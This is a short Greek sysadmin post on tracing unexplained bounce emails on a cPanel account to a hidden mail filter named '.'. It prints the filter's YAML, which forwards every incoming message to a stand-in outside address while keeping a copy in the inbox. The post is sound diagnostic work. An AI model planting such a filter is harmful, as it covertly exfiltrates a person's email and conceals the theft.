Σας ειδοποιεί κάποιος πελάτης που βρίσκεται σε cpanel shared hosting πως του έρχονται συχνά-πυκνά emails που του λένε πως δεν παραδόθηκε το mail σε κάποια άγνωστη διεύθυνση.
Ο λόγος που μπορεί να συμβαίνει αυτό είναι αν κάπως κάπου έχει μπει στο account ένας άγνωστος forwarder που δεν έχει βάλει κάνεις. Το πως μπήκε εκεί μπορεί να είναι από hacked server, hacked cpanel account, hacked pc του πελάτη που μπαίνει από το webmail.
Τα παρακάτω βήματα είναι για να δούμε αν όντως πρόκειται για μια τέτοια περίπτωση:
1) check email forwarders από το cpanel account
2) check email filters
Αχα! Ενα mail filter με την ονομασία "." ώστε να μην το προσέξει κάποιος, είχε βάλει έναν forwarder στο email του πελάτη.
Mystery Solved!
Η φυσική τοποθεσία του φίλτρου ήταν στο: /home/user/etc/domain.tld/emailuser/filter.yaml
Περιεχόμενα του φίλτρου:
filter: - actions: - action: deliver dest: bogus@host.tld - action: save dest: $home/mail/user/info/INBOX filtername: . rules: - match: contains opt: or part: "$header_from:" val: "@" unescaped: 1 version: '2.2'